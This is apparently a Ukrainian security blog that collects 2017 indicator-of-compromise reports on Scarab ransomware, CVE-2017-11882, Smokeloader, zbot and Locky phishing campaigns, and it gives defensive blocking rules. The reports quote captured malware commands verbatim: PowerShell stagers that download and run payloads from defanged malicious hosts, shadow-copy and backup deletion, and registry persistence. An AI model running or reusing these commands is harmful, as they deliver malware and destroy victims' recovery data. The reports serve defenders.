IOC_Scarab_231117

Доброго дня, панове.

Звіт стосується розсилок Scarab Ransomware, які відбувалися на минулому тижні. Публікую для академічного розгляду оскільки:

Рівень загрози – нижче середнього. Для тих, хто прислухався до моїх рекомендаційнизький.

Звернень по цьому типу мені не надходило, а кім того, технічно механізм інфікування Scarab не відрізняється від інших (Locky, Cerber), які я вже розглядав.

Проте зважаючи на те, яку увагу (з подачі Кіберполіції) ЗМІ приділили розсилкам саме цього зразка – вирішив усе ж таки його розібрати.

Не без того, щоб вкотре нагадати вам прості та дієві методи захисту.

Трохи аналітики:

  • Шифрування стійке. На даний момент способу відновити файли – не знайдено
  • Факти інфікування даним класом шкідливого коду говорять про низький рівень обізнаності
  • Scarab спричинив багато галасу, бо на відміну від Locky, він шифрує одразу без перевірки умов, ще раз – Scarab шифрує завжди там, де був запущений
  • А це значить, що жертви Scarab ігнорували попередні інциденти тому що, розсилки з Locky не призводили до шифрування
  • Метод доставки – масовий, неперсоніфікований, нелокалізований, низькоякісний фішинг типу “відскановані документи”
  • Тип приманки – необфусковані VBS скрипти в архівах 7zip
  • Скрипти містять від 2 до 3 посилань на завантаження основної частини
  • Активація та шифрування відбуваються з правами користувача і можуть проходити без мережевих з’єднань (offline)
  • Ім’я основної частини чітко задане кодом скрипту і не змінюється
  • Перед початком шифрування зразок намагається видалити Shadow Copy, якщо права не надавати – шифрування продовжиться, просто без видалення тіньових копій

Схема атаки:

email > Attach 7z (VBS) > WSCript > GET JHgd476? > %temp%\VJMAQASU.exe

Маркери IOC:

приклади листів:

один із скриптів-приманок:

File name image2017-11-22-5379282.vbs
SHA-256 fd072a6c2fe9187f799a27e21c27fc67dd2f145ccbc0faa917f37469d0d26974
File size 3.8 KB

містить три посилання на завантаження основної частини:

krapivec = Array("miamirecyclecenters[.]com/JHgd476?","pamplonarecados[.]com/JHgd476?","hard-grooves[.]com/JHgd476?")

Останнє – досі активно і на звернення видає основну частину:

File name JHgd476  >> %temp%\VJMAQASU.exe
SHA-256 7a60e9f0c00bcf5791d898c84c26f484b4c671223f6121dc3608970d8bf8fe4f
File size 356.5 KB

Приклад запуску без надання привілеїв:

Приклад запуску із наданням привілеїв через UAC:

Запуск скрипту приводить до завантаження основної частини за шляхом %temp%\VJMAQASU.exe

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\image2017-11-22-5379282.vbs" 
"C:\Windows\System32\cmd.exe" /c call "C:\tmp\VJMAQASU.exe"
"C:\tmp\VJMAQASU.exe"

Після запуску Scarab через cmd.exe копіює своє тіло у %AppData%\Roaming\sevnz.exe

Та намагається отримати підвищення привілеїв для видалення тіньових копій (UAC)

Якщо йому це вдається, він копіює своє тіло ще раз у %AppData%\Roaming але вже для адміністративного облікового запису

"C:\Windows\system32\cmd.exe" /c copy /y "C:\tmp\VJMAQASU.exe" "C:\Users\operator\AppData\Roaming\sevnz.exe"
"C:\tmp\VJMAQASU.exe" runas
"C:\Windows\system32\cmd.exe" /c copy /y "C:\tmp\VJMAQASU.exe" "C:\Users\support\AppData\Roaming\sevnz.exe"
"C:\Users\support\AppData\Roaming\sevnz.exe"

Далі через mshta за допомогою javascript команд Scarab додає в автозавантаження посилання на замітку про викуп і ініціює видалення тіньових копій:

mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\uSjBVNE',i);}catch(e){}},10);"
mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\STYRX\\OCDPR'));close();"
"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet
vssadmin  Delete Shadows /All /Quiet
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

В фоні відбувається шифрування через послідовний перезапис файлів процесом AppData\Roaming\sevnz.exe

По завершенню шифрування Scarab відкриває файл із заміткою про викуп та ініціює видалення свого тіла (за обома шляхами – temp та appdata)

C:\Windows\system32\cmd.exe /c start /max notepad.exe "C:\Users\support\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
notepad.exe  "C:\Users\support\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('sevnz.exe');close()}catch(e){}},10);"
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('VJMAQASU.exe');close()}catch(e){}},10);"

Зашифровані файли отримують розширення .[suupport(@)protonmail[.]com].scarab

Шифрування невеликої кількості документів зайняло ~5-7 хвилин

Частина замітки про викуп:

__________________________________________________________________________________________________
|                                                                                                  |
|                 *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS ***                 |
|__________________________________________________________________________________________________|

Your files are now encrypted!

-----BEGIN PERSONAL IDENTIFIER-----
123oin123njnjndoiqn2oenq2oindiqndkqndknwqkndkawndkawndkl
-----END PERSONAL IDENTIFIER-----

All your files have been encrypted due to a security problem with your PC.

Мережеві IOC:

завантаження основного тіла Scarab:

5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1 
98.124.251.75:80      HTTP 375 atlantarecyclingcenters[.]com GET /JHgd476? HTTP/1.1
66.36.165.149:80      HTTP 372 hellonwheelsthemovie[.]com GET /JHgd476? HTTP/1.1
5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1
66.36.165.149:80      HTTP 372 hellonwheelsthemovie[.]com GET /JHgd476? HTTP/1.1
98.124.251.75:80      HTTP 371 miamirecyclecenters[.]com GET /JHgd476? HTTP/1.1
5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1
66.36.173.111:80      HTTP 364 hard-grooves[.]com GET /JHgd476? HTTP/1.1 (досі активний)

відправка даних про Public IP

88.99.66.31:80       HTTP 101 iplogger[.]co GET /18RtV6.jpg HTTP/1.1 - передача через cookie

Що можна було зробити аби уникнути інфікування ?

  1. Фільтр скриптових приєднань (VBS, JS, JSE, WSF..)
  2. Заборона завантаження скриптових та запусних файлів (payload у Scarab не шифрований)
  3. Заборона створення VBS та EXE в каталозі профілю користувача (приклади правил наведені нижче)
  4. Деактивація механізму Windows Scritp Host (другий варіант)
  5. Або блокування вихідного трафіку для процесів WSCritp та CSCript (перший варіант)

Приклади правил Access Protection (McAfee VSE, McAfee ENS):

Заборона створення запускних файлів

Name: _exe_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.EXE
File actions to prevent:
+ Read
+ Write
+ Create
+ Execute

Заборона створення скриптових файлів (увага! приклад тільки для VBS, рекомендується продублювати правила для JS, JSE, WSF)

Name: _VBS_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.VBS
File actions to prevent:
+ Read
+ Write
+ Create
+ Execute

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/створення/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

IOC_EQNEDT32_211117

Запуск коду через редактор формул або CVE-2017-11882

Доброго вечора, панове.

Увага, 21го листопада було зафіксовано перші спроби застосування CVE-2017-11882 для доставки шкідливого коду.

Рівень загрози – високий!

У зоні ризику всі, хто не встановив оновлення MS Office.

Ця вразливість редактору формул, яка стосується MS Office 2007, 2010, 2013 та 2016.

Трохи аналітики:

  • код запускається від імені простого користувача через процес редактору формул
  • редактор формул отримує команди не напряму від додатку MS Office, а через svchost
  • код виконується одразу по факту відкриття документу, без діалогових вікон!
  • у файлі, який використовувався зловмисниками запуск/завантаження проміжного payload був реалізований через cmd.exe
  • розсилка яка проводилась 21го листопада не була направлена на українські організації
  • найближчим часом слід очікувати застосування цього методу при атаках на наші підприємства
  • відео, детальний опис експлуатації та тестовий файл на запуск calc.exe

Схема атаки:

email > Attach (RTF) > WINWORD.EXE > SVCHOST.EXE > EQNEDT32.EXE > CMD.EXE > ...

Маркери IOC:

документ приманка:

Filename      Swift changes.rtf
SHA256      17f9db18327a29777b01d741f7631d9eb9c7e4cb33aa0905670154a5c191195c
Size            31.07 KB

Спроба відкрити документ-приманку ініціює завантаження та запуск проміжної частини засобами cmd

cmd /c start \\138.68.234.128\w\w.exe

файл

Filename     w.exe
SHA256      60656140e2047bd5aef9b0568ea4a2f7c8661a524323111099e49048b27b72c7
Size           240.5 KB

На даний момент посилання вже недійсне.

Мережеві IOC:

завантаження проміжного payload

138.68.234.128

трафік скомпрометованої системи

104.144.207.207

Що можна було зробити аби уникнути інфікування ?

Для тих, у кого немає можливості на 100% встановити виправлення вразливості, можна застосувати просте правило Access Protection

Name: _11882_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: EQNEDT32.EXE
File actions to prevent:
+ Read
+ Write
+ Execute

Контрзаходи:

  • Розгортання оновлень CVE-2017-11882 | Microsoft Office Memory Corruption Vulnerability
  • Зміна параметру Compatibility Flags в реєстрі – у моєму випадку не виправило запуску довільного коду
  • Заборона запуску вразливого процесу EQNEDT32.EXE (VSE/ENS Access Protection – див. приклад вище, групові політики)
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_121117_ДСНС_gov.ua

Доброго дня, панове.
Візьміть до уваги – в розсилці приймала участь скринька з домену gov.ua (заголовки не підроблені)!

12 листопада, близько 23ї години були зафіксовані спроби доставки троянського коду типу Smokeloader (Chanitor) (попередні зразки тут, тут і тут).
Цей клас шкідливого коду є сервісом доставки троянів або модулів для крадіжки паролів (Pony та ін.)
Фактично через нього зловмисники збирають інформацію із скомпрометованих систем і можуть в подальшому довантажити модуль шифрування/затирання файлів.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) – зверніть увагу на приклади трьох правил Access Protection які наведені в кінці допису

Трохи аналітики:

  • Рівень загрози – високий!, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.
  • Незважаючи на вельми примітивну техніку активації приманки (JS скрипти) я ставлю цій розсилці високий рівень загрози через той факт, що одним із джерел була скомпрометована скринька Управління ДСНС Чернігівської області (sribne@cndsns[.]gov[.]ua)

  • Схема роботи та інші атрибути вказують на роботу тої самої команди що розсилала цей же тип ШПЗ 17 жовтня
  • Доставка – через обфусковані JS скрипти із подвійним розширенням у оболонці lzh. (застосували інший формат для обходу фільтрів пошти)
  • Скрипт який було надано а аналіз містить одну прямо задану адресу, а основна частина записується із прямо заданим іменем файлу
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Сервер з якого завантажується payload та сервер контролю – один і той же
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Знову застосовується тактика використання скомпрометованих ресурсів/серверів держ. організацій – gov.ua як правило в “білому” списку
  • Слід очікувати повторних акцій із використанням міксу різних типів доставки та скомпрометованих джерел із зони gov.ua та ua
  • Не достатній рівень уваги до вразливостей застарілих версій систем, яким скористалися зловмисники, призвела до компрометації цього серверу, завтра чи навіть через годину хтось може стати наступним – не будьте жертвою, перевірте наявні вразливості, оновіть софт, змініть паролі

Схема атаки:

email > Attach (lzh) > JS > WSCript > PowerShell > single hardcoded URL > GET > %temp%\65536.exe 
ім'я запускного файлу(співпадає з попередньою розсилкою)

Маркери IOC:

архів:

File name Рахунки Продмаркет.lzh
SHA-256 a47e11e6dc8025575ac3f1742fcf84270d9cd2ab1757d59dee873b1a35f76528
File size 65.34 KB

скрипт приманка:

File name Рахунок по оплаты.xls.js
SHA-256 d0635dfd5e212e16c580d70a18d195a5cc842355a22348f925515a5520725231
File size 21.38 KB

основна частина:

File name micro.exe >> %temp%\65536.exe
SHA-256 63da5f0e5ed298cbf39422298c80f460fa75f46c7d78ce0dd806f30e70c027b5
File size 240 KB

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\рахунок до оплаты.xls.js"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;
$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';
$http_request.open('GET', 'h11p:\\autoxls[.]ru/documentooborot/micro.exe', $false);
$http_request.send();if($http_request.Status -eq "200"){$adodb.open();
$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;
$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\65536.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у

%User%\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe (співпадає з попередньою розсилкою)

Та додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-....\Software\Microsoft\Windows\CurrentVersion\Run
IM Providers
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Запускає кілька нових екземплярів explorer.exe і оперує від їх імені.

Зверніть увагу, що запущені процеси на х64 запускаються не з C:\Windows\ (штатний режим) а з C:\Windows\SysWOW64\

Мережеві IOC:

завантаження payload – досі активна

54.86.9.242:80 HTTP 375 autoxls[.]ru GET /documentooborot/micro.exe HTTP/1.1

трафік скомпрометованої системи – сервер контролю

54.86.9.242:80 HTTP 117 bbank[.]bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

а тепер саме головне

Що можна було зробити аби уникнути інфікування ?

  1. Пересилку архіву із скриптом можна було заблокувати через фільтр приєднань по розширенням/типам файлів, але за умови що він розуміє формат lzh (Email Gateway)
  2. Запис JS приманки на диск (розпаковку файлів) можна було заборонити через блок створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Передачу команди з WSCript на Powershell можна було заборонити через Access Protection Rules
  6. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)
Таким чином, як бачите, до запуску основного тіла було 6 кроків, упередження хоча би одного з них = зупинка атаки.

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона вихідних мережевих зєднань для процесів Powershell
  • Заборона виклику POwershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_zbot(RTF.OLE.JS)_021117

Доброго дня, панове.

Візьміть до уваги.

Отримав на аналіз документ приманку активація якої призводить до завантаження модифікованого zbot (Trojan).

Рівень загрози – середній. Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Трохи аналітики:

  • Розсилка цього зразка проводилася ще 2-го листопада – посилання досі активні!
  • Лист та приманка локалізовані
  • Сервер що містить payload одночасно виступає сервером контролю (уже було)
  • Файл представляє собою RTF із OLE в якості об’єкту – js скрипт (комбінують різні способи)
  • На тестових системах нормально відобразився лише у Wordpad (2007й та 2013й Word не відкрили файл коректно)
  • Схема виклику трохи відрізняється від попередніх: WORDPAD > WSCript > Powershell > %temp%\*.exe
  • Оновлення MS Office, деактивація DDE від таких файлів не захищає, це OLE.
  • Тут або OLE вимикати, або мої правила застосовувати, або powershell блокувати.

Схема атаки:

email > .docx (RTF - OLE - JS) > запитання1? > WSCript > powershell > GET payload > %temp%\*.exe

Маркери IOC:

Дані по листу

2017-11-02 01:58:53 AM 
Connection from: 193.111.156.1 (mail.iphone.net.ua)
Sending server HELO string: mail.iphone.net.ua
Message id:
Message reference: ххххххххххххх
Sender: mmc@hl[.]ua
Recipient: *****@company.com.ua
SMTP Status: OK
Delivery attempt #1 (final)

Приєднання – документ-приманка

 

File name договор УРК.docx 
SHA-256 bcfd72b7a469940c1168bba27803c13bc350dedb23e85322b8e658de2df99ac4
File size 49.73 KB

При відкритті файлу користувача просять двічі клікнути по вбудованому об’єкту.

Якщо жертва клікає та ігнорує попередження – в %temp% видобувається скрипт

File name задолжность (2).js 
SHA-256 ef005f96c37eb2a1ab4a78aa9022397b0b5d73bba998057d17725038072f5c17
File size 19.84 KB

Виконання якого передає команду на powershell:

"C:\Program Files\Windows NT\Accessories\WORDPAD.EXE" "C:\Users\operator\Desktop\договор УРК.docx" 
"C:\Windows\System32\WScript.exe" "C:\tmp\задолжность (2).js"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';$http_request.open('GET', 'h11p://autoxls[.]ru/documentooborot/micro.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

Виконання команд призводить до завантаження payload

File name micro.exe  >> tmp\65536.exe
SHA-256 c47b43a0321f3c13fe42945bfa5bcbe223d8d326335d5856dd7c02dd07616fb8
File size 439.5 KB

Після його запуску він дублює себе у %appdata% із зміненою контрольною сумою мімікруючи під звичайні додатки (кожен запуск – інший: Skype, Mozilla, Macromedia, DTL etc)

"C:\tmp\65536.exe" 
"C:\Users\operator\AppData\Roaming\DAEMON Tools Lite\DAEMONToolsLiteSync.exe"
"C:\Windows\system32\cmd.exe" /c "C:\tmp\tmp8426d97e.bat"

 

File name DAEMONToolsLiteSync.exe 
SHA-256 65cb0804986075d3a8ed004a043cef3c3a2db6cff15788f6d5267d9abd711733
File size 439.5 KB

Крім того закріплюється через автозавантаження

HKEY_USERS\S-1-5-...\Software\Microsoft\Windows\CurrentVersion\Run
{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} 
"C:\Users\operator\AppData\Roaming\DAEMON Tools Lite\DAEMONToolsLiteSync.exe"

Після запуску починає активний мережевий обмін із сервером контролю.

Стандартні правила Acces Protection які могли б зупинити, яки були активовані:
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\PROGRAM FILES\WINDOWS NT\ACCESSORIES\WORDPAD.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Delete
Would be blocked by port blocking rule (rule is currently not enforced) C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE Common Maximum Protection:Prevent HTTP communication 45.76.198.223:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Delete
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by port blocking rule (rule is currently not enforced) C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE Common Maximum Protection:Prevent HTTP communication 45.76.198.223:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by port blocking rule (rule is currently not enforced) C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE Common Maximum Protection:Prevent HTTP communication 45.76.198.223:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати механізм OLE
  2. Заборонити процесам MS Office створювати дочірні процеси крім кількох довірених (політики ENS ATP – DAC)
  3. Заборонити створення та зчитування/запуску *.JS* з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)
  4. Деактивація WSH (обробка скриптових файлів)
  5. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом)
  6. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження основного тіла

45.76.198.223:80 HTTP 375 autoxls[.]ru GET /documentooborot/micro.exe HTTP/1.1

трафік скомпрометованої системи

45.76.198.223:80 HTTP 590 docfileserver[.]ru POST /web/ HTTP/1.1

Контрзаходи:

  • Деактивація OLE через реєстр чи групові політики
  • Заборона створення дочірніх процесів для додатків MS Office (додати туди WSCript та WORDPAD)
  • Заборона доступу до мережі Інтернет для powershell (по аналогії із варіантом 1)
  • Деактивація WSH
  • Заборона створення та зчитування/запуску *.EXE та скриптових з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

%random%.doc > OLE(ps) > wera4.exe

Отримав на аналіз черговий зразок документу із OLE у вигляді ярлика на powershell.

Незважаючи на той факт, що даний зразок не був націлений на українські системи – в котре наголошую, що через певний час тактику застосування таких документів (тільки локалізованих та з іншими зображеннями) візьмуть на озброєння зловмисники, що будуть атакувати українські організації. Тому, будьте ласкаві, перевірте ще раз  – чи вжили ви необхідних заходів, аби активація такої приманки не залежала від людського фактору і була блокована одним із наведених методів у розділі “Контрзаходи”

Навіть зображення не змінили:

При активації в %temp% записується 4.lnk який містить такий рядок:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "$rv=[System.Uri]'h11p:\\with-hair[.]co.jp/693';$dx=(new-object IO.StreamReader((([Net.WebRequest]::Create($rv)).GetResponse()).GetResponseStream())).ReadToEnd();IEX $dx;"

Якщо жертва активує вбудований об’єкт процес Winword передає керування на powershell, що призводить до отримання списку адрес (необфускований)

Перелік із 6 URL по даній кампанії (завантаження проміжного payload який довантажує Locky)

$cpknos = "h11p:\\teesaddiction[.]com/JHgd3Dees","h11p:\\christaminiatures[.]nl/JHgd3Dees","h11p:\\336.linux1.testsider[.]dk/JHgd3Dees","h11p:\\florastor[.]net/JHgd3Dees","h11p:\\heinzig[.]info/JHgd3Dees","h11p:\\muchinfaket[.]net/p66/JHgd3Dees"
$cpknos = $cpknos | Sort-Object {Get-Random}
foreach($cpkno in $cpknos){
Try{
Write-Host $cpkno
$scpm = "$env:temp\wera4.exe"
Write-Host $scpm
$dum = (New-Object System[.]net.WebClient)
$dum.DownloadFile([System.Uri]$cpkno, $scpm)
Start-Process $scpm
break
}Catch{}}

Результат активації

Dropper та проміжний payload детектуються McAfee

Контрзаходи:

(такі самі як у попередньому аналізі)

Будьте уважні та обережні!

VR

OLE(ps) замість DDE

загадка:

не DDE, не макрос, а powershell викликає..

Доставку Locky почали здійснювати за допомогою OLE, де в якості об’єкту – ярлик на Powershell.

Важливий момент – в цьому випадку оновлення MS, деактивація DDE від таких файлів не захищає, бо це старе OLE. Інший механізм.

У кого було блокування створення .exe в профілі або хоча би %temp% – захищені

У кого були обидва правила на дочірні процеси – і на CMD і на Powershellзахищені

Усім іншим поки що повезло, бо проміжний downloader не завантажував основну частину на системи українського сегменту. Поки що.

В котре наголошую, що на фоні масових розсилок, які поки що не шкодять, в окремих цільових атаках можуть застосовуватися схожі, але вже локалізовані документи – із різними типами начинки як DDE, так і OLE, macros.

Схема атаки:

